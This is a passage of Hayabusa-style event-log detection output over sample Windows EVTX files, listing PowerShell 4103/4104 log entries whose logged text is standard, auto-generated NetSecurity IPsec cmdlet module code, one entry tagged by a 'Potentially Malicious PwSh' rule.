value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.521 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.523 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 